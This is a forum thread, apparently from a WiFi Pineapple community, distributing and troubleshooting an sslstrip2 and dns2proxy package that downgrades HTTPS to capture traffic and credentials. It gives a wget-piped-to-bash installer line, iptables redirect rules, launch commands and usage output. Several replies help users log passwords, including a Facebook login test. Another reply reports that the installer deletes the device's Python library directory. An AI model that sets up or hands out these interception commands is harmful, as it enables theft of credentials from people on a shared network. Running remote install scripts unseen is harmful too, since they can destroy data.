Jump to content

SSLstrip2 + dns2proxy (HSTS Bypassing)


Zylla

Recommended Posts

SSLstrip2 + dns2proxy
Now WORKING on the Pineapple NANO + TETRA.


Last update: 15.01.2017
Changelog:

  • Uploaded everything to github.


Install procedure:

root@Pineapple:~#  wget -qO- https://raw.githubusercontent.com/adde88/sslstrip-hsts-openwrt/master/INSTALL.sh | bash -s -- -v -v

(This launches a install script that downloads a .ipk file containing the tools, and installs all the python-libaries correctly.)


What now?
sslstrip2 and dns2proxy gets installed to /usr/share/, or /sd/usr/share when using the Pineapple NANO.
When using dns2proxy, please check that you traverse into its directory before launching it. (If not you might encounter errors about missing files: (nospoof.cfg) etc.)

root@Pineapple:~# cd /sd/usr/share/sslstrip2/
root@Pineapple:~# python sslstrip.py --help

root@Pineapple:~# cd /sd/usr/share/dns2proxy/
root@Pineapple:~# python dns2proxy.py --help


Github repo. + source-files:
https://github.com/adde88/sslstrip-hsts-openwrt
 

OPKG Installation File: (For those who want to install it manually)
https://github.com/adde88/sslstrip-hsts-openwrt/raw/master/sslstrip-hsts_0.9_ar71xx.ipk

Link to comment
Share on other sites

  • Replies 84
  • Created
  • Last Reply
1 minute ago, mercredi said:

Hi,

Thank you for your work!

Everything works good, but a can't see any credentials on log files.

Good to hear that it's working!
About the logs: how du you launch sslstrip? what options are you supplying when start it? (like the exact command you are issuing to start it)

Link to comment
Share on other sites

First i run

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python sslstrip.py -l 9000 -p -w log.txt
python dns2proxy.py

 

 

 

I got this error when i run: python sslstrip.py -l 9000 -p -w log.txt

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

 

Link to comment
Share on other sites

23 hours ago, mercredi said:

First i run


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000

iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python sslstrip.py -l 9000 -p -w log.txt

python dns2proxy.py

 

 

 

I got this error when i run: python sslstrip.py -l 9000 -p -w log.txt

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

 

I'll do some testing later today, and see if i can replicate the issue. :)

Link to comment
Share on other sites

On 17.1.2017 at 6:11 PM, mercredi said:

thanks

 

Which command did you use to make it work and see SSL POST? I try all option, but i can see only http.

In the iptables command you used above you are only redirecting port 80 (HTTP).
You will need to redirect the HTTPS port (443) if you want to get that traffic aswell.
That would explain why you're not seeing any encrypted traffic.

Link to comment
Share on other sites

It seems like i might have slept to little the last week, lol.
You're not supposed to redirect port 443.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

(replace "$interface_name_here" with the interface you are using)


Here's the usage of both tools:
sslstrip+

sslstrip 0.9 + by Moxie Marlinspike
Version + by Leonardo Nve
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

 

dns2proxy:

usage: dns2proxy.py [-h] [-N] [-i INTERFACE] [-u IP1] [-d IP2] [-I IPS] [-S]
                    [-A ADMINIP]

optional arguments:
  -h, --help            show this help message and exit
  -N, --noforward       DNS Fowarding OFF (default ON)
  -i INTERFACE, --interface INTERFACE
                        Interface to use
  -u IP1, --ip1 IP1     First IP to add at the response
  -d IP2, --ip2 IP2     Second IP to add at the response
  -I IPS, --ips IPS     List of IPs to add after ip1,ip2 separated with commas
  -S, --silent          Silent mode
  -A ADMINIP, --adminIP ADMINIP
                        Administrator IP for no filtering
Link to comment
Share on other sites

What is the exact command to see encrypted traffic?  

On 1/16/2017 at 8:07 AM, Zylla said:

Good to hear that it's working!
About the logs: how du you launch sslstrip? what options are you supplying when start it? (like the exact command you are issuing to start it)

 

Link to comment
Share on other sites

12 hours ago, Grognak said:

What is the exact command to see encrypted traffic?  

 

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log
Link to comment
Share on other sites

On 20.1.2017 at 7:18 PM, crazyclown said:

Will this work on the Mark V Firmware 2.4?

Sadly my Mark VI is dead, but i am pretty certain that one guy in this thread tested it, and mentioned that it was working.
You could just test it and report back. I don't see any special reasons for it not working.

Link to comment
Share on other sites

  • 2 weeks later...

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

Link to comment
Share on other sites

On 2/8/2017 at 2:00 AM, Null Trace said:

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

Hey Null Trace, you can have it running in the background if you install screen.

You can install this by using:

opkg install screen

and then when you ssh in run screen first, by typing 'screen' and then run the commands and before disconnecting hitting CTRL-A and then D.

To retrieve your screen session type 'screen -r' if you have more then one screen instance it will list them and you will need to type 'screen -r 4322' for example.

If you want to close a screen instance retrieve it as above and type 'exit'.

As for running DWall etc I'm note sure if it will work alongside sorry :)

Hope this helps.

Link to comment
Share on other sites

Hello,

I "seem" to have this working, as in no errors and I can see all the dnsproxy info flashing accross the screen.  I am not able to capture any passwords (i did a test with facebook.com and typed in a bogus email and password).  I also used tcpdump and looked at the results.  My data is still encrypted so thats why I cannot see my email address or password.  Anyone have any ideas?  Below are the commands I'm using.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python dns2proxy.py -i wlan0  

python sslstrip.py -a -w /tmp/sslstrip_log

* wlan0 is the interface im hosting my AP on.  Please see attachment for networking screen.

 

Thanks!!

Scrag

 

network.PNG

Link to comment
Share on other sites

Hey Everybody.

I was really hoping someone could help a noob out  ;)

I "almost" got this working but I am stuck.  It appears dns2proxy is working but sslstrip is not.  Sslstrip just sits there after loading and does not display any info, and of course, does not strip ssl.

Here is what I'm doing:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

cd /sd/usr/share/dns2proxy/
python dns2proxy.py

cd /sd/usr/share/sslstrip2/
python sslstrip.py -a -w /sd/ssltrip-log.txt

I can visually see all kinds of responses on the dns2proxy screen, but for sslstrip, it just sits at

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve

Any thoughts?

 

Thanks!

Scrag

Link to comment
Share on other sites

  • 2 weeks later...

Okey. To clear things up a bit.
SSLstrip2 + dns2proxy does not work on every site. Good examples are Google and Facebook.
Browsers and sites have implemented fixes against this attack, like caching.

But it does have more success-chance compared to regular boring sslstrip :)

Link to comment
Share on other sites

On 10.3.2017 at 5:16 AM, Tar said:

Any news on updates like a module or something sweet?

Would very much like to see a module :P

Hi there!
I do have plans for making a module.
It's just that other stuff have been higher on my agenda, and i've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who wasn't interested in Mana could still have an interest in sslstrip+, so i just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully i got something soon :)

Link to comment
Share on other sites

On 3/14/2017 at 8:23 AM, Zylla said:

Hi there!
I do have plans for making a module.
It's just that other stuff have been higher on my agenda, and i've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who wasn't interested in Mana could still have an interest in sslstrip+, so i just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully i got something soon :)

Hehe, yeah man a module would be great :P

One of the main reasons I got the wifipineapple was to use SSLstrip on my network, take your time lad looking for some great things out of this community :)

Link to comment
Share on other sites

To those installing this, you may want to go though the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

Link to comment
Share on other sites

2 minutes ago, Dirty Frank said:

To those installing this, you may want to go though the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card.
For simplicity, and also because of the size of the libraries, i found it much better to have one directory on the SD-card and just sym-link that to the other directory.

But i guess, i can create warning message in the installer-script. Just in case :)

Link to comment
Share on other sites

2 hours ago, Zylla said:

You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card.
For simplicity, and also because of the size of the libraries, i found it much better to have one directory on the SD-card and just sym-link that to the other directory.

But i guess, i can create warning message in the installer-script. Just in case :)

How about the installer symlink the installed files instead of the directory iteself (ala install the pkg to /sd and then "ln -s /sd/usr/lib/python2.7/* /usr/lib/python2.7" ?

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...